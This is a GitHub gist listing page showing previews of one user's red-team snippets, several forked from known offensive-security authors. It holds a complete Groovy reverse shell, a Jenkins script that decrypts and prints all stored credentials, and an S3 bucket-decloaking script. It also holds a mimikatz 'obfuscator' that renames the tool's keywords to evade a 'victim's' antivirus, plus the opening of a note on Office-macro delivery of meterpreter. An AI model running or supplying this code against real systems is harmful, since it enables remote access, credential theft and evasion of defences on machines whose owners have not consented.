insi2304’s gists

insi2304 / k8s_dns_enum.py

Created July 13, 2023 05:02

Enumerate Kubernetes Services

	import socket

	# Resolve DNS
	resolver = socket.getaddrinfo("any.any.svc.cluster.local", None)

	ports = []
	hosts = []

	print("Services and ports running in this cluster")
	print("------------------------------------------")

insi2304 / decrypt_jenkins_creds.groovy

Created July 12, 2023 08:19

Decrypt Jenkins credentials

	println("id".execute().text)
	println(hudson.util.Secret.decrypt("{XXX=}"))
	com.cloudbees.plugins.credentials.SystemCredentialsProvider.getInstance().getCredentials().forEach{
	it.properties.each { prop, val ->
	if (prop == "secretBytes") {
	println(prop + "=>\n" + new String(com.cloudbees.plugins.credentials.SecretBytes.fromString("${val}").getPlainData()) + "\n")
	} else {
	println(prop + ' = "' + val + '"')
	}
	}

insi2304 / notebook.ipynb

Last active March 23, 2023 10:56

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

insi2304 / Jenkinsfile

Created January 29, 2023 18:41 — forked from HarmJ0y/Jenkinsfile

Rubeus Jenkinsfile

	@Library('ci-jenkins-common') _

	// Jenkins build pipeline (declarative)

	// Project: Seatbelt
	// URL: https://github.com/GhostPack/Seatbelt
	// Author: @tifkin_/@harmj0y
	// Pipeline Author: harmj0y

	def gitURL = "https://github.com/GhostPack/Seatbelt"

insi2304 / bucket-disclose.sh

Created January 27, 2023 04:41 — forked from fransr/bucket-disclose.sh

Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages

	#!/bin/bash

	# Written by Frans Rosén (twitter.com/fransrosen)
	_debug="$2" #turn on debug
	_timeout="20"
	#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
	_aws_key="AKIA..."
	H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
	H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

insi2304 / revsh.groovy

Created January 23, 2023 05:20 — forked from frohoff/revsh.groovy

Pure Groovy/Java Reverse Shell

	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

insi2304 / manager-config.yml

Created January 4, 2023 11:02 — forked from byt3bl33d3r/manager-config.yml

Nebula configuraton files for docker swarm manager and worker nodes

	# !! Remember to replace LIGHTHOUSE_IP with your actual Nebula lighthouse external IP Address
	# See the example config file to know what all of these options do https://github.com/slackhq/nebula/blob/master/examples/config.yml

	pki:
	ca: /etc/nebula/ca.crt
	cert: /etc/nebula/host.crt
	key: /etc/nebula/host.key

	static_host_map:
	"192.168.100.1": ["<LIGHTHOUSE_IP>:4242"]

insi2304 / .htaccess

Created December 14, 2022 04:43 — forked from curi0usJack/.htaccess

FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.

	#
	# TO-DO: set \|DESTINATIONURL\| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#

insi2304 / mimikatz_obfuscator.sh

Created October 11, 2022 18:21 — forked from imaibou/mimikatz_obfuscator.sh

Mimikatz Obfuscator

	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/windows
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/windows/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

insi2304 / Various-Macro-Based-RCEs.md

Created September 2, 2022 06:30 — forked from mgeeky/Various-Macro-Based-RCEs.md

Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

Page substiution macro for luring user to click Enable Content
The Unicorn Powershell based payload